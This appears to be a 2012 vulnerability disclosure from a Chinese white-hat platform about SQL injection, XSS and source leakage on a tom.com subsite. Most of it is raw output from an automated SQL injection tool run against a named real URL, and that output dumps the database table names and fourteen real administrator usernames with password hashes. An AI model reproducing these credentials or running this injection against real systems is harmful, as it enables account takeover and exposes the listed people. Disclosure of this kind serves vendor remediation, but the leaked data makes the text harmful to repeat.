2012-05-28: 细节已通知厂商并且等待厂商处理中 2012-05-29: 厂商已经确认,细节仅向厂商公开 2012-06-08: 细节向核心白帽子及相关领域专家公开 2012-06-18: 细节向普通白帽子公开 2012-06-28: 细节向实习白帽子公开 2012-07-12: 细节向公众公开
sql注入整站xss源码泄露等。。。
http://dgbest.tom.com/article.php?id=33500 注入Analyzing http://dgbest.tom.com/article.php?id=33500Host IP: 202.108.13.17Web Server: Apache/2.2.8 (Fedora)Powered-by: PHP/5.2.5Keyword Found: 2Injection type is String (')DB Server: MySQL >=5Selected Column Count is 13Injection type is String (')Valid String Column is 10Current DB: dgbestCount(table_name) of information_schema.tables where table_schema=0x646762657374 is 41Tables found: dg_comments,dg_index_home,dg_links,dg_ngg_album,dg_ngg_gallery,dg_ngg_pictures,dg_options,dg_postmeta,dg_posts,dg_term_relationships,dg_term_taxonomy,dg_terms,dg_usermeta,dg_users,dgbest_acl,dgbest_ad,dgbest_ad_position,dgbest_ad_record,dgbest_admin,dgbest_application,dgbest_ding,dgbest_ezine,dgbest_ezine_content,dgbest_ezine_flash,dgbest_ezine_read,dgbest_focus,dgbest_gallery,dgbest_gallery_pic,dgbest_links,dgbest_manual_update,dgbest_recommend_category,dgbest_recommend_editor,dgbest_recommend_product,dgbest_recommend_relation,dgbest_recommend_topic,dgbest_right,dgbest_score,dgbest_special,dgbest_timeline,dgbest_tomad,dgbest_voteCount(column_name) of information_schema.columns where table_schema=0x646762657374 and table_name=0x6467626573745F61646D696E is 3Columns found: id,user_login,user_passCount(*) of dgbest.dgbest_admin is 14Data Found: id=1Data Found: user_login=adminData Found: user_pass=bfe5e7ac5b9f32f17946ac00ac6f0123Data Found: id=2Data Found: user_login=yangmingData Found: user_pass=91a65eaef41f964d3524479310245b33Data Found: id=3Data Found: user_login=wangyingxinError (10060): The attempt to connect timed outTurning off 'bypass illegal union' and retrying!Data Found: user_pass=628222ffbf2626ac9d8bcea148d55005Data Found: id=4Data Found: user_login=dujieData Found: user_pass=ca7e85cdc89307977dfc51ff97304857Data Found: id=5Data Found: user_login=liangdongData Found: user_pass=6cc1c13284d5fee2f9259d0ee645aebdData Found: id=6Data Found: user_login=lixiaochenData Found: user_pass=b01909722fa963b9511b6821a2c96e25Data Found: id=7Data Found: user_login=sunpengData Found: user_pass=65579ea54311e21d32d15163a36ba7b6Data Found: id=8Data Found: user_login=wurongData Found: user_pass=cc1bf4721089b6ea8a5daa8c1263ece2Data Found: id=9Data Found: user_login=chenfangData Found: user_pass=54ab9bca0490effc30025fa7b3324991Data Found: id=10Data Found: user_login=lichaoData Found: user_pass=a382cd40eaf65b6d98f0135e2fa3f016Data Found: id=11Data Found: user_login=zhaodandanData Found: user_pass=12acce7e5f6c89a80e0fe927f25f0105Data Found: id=12Data Found: user_login=haopengData Found: user_pass=3bc9581877e315150ceeddca46623ec6Data Found: id=13Data Found: user_login=dongmingchaoData Found: user_pass=7af12d9b872068e01e7c6882ae146e14Data Found: id=14Data Found: user_login=captainData Found: user_pass=ab334feeb31c05124cb73fa12571c2f6
XSS 整理麻烦。
加强安全体系。你们懂的。QQ2036234
危害等级:高
漏洞Rank:20
确认时间:2012-05-29 09:52
谢谢
暂无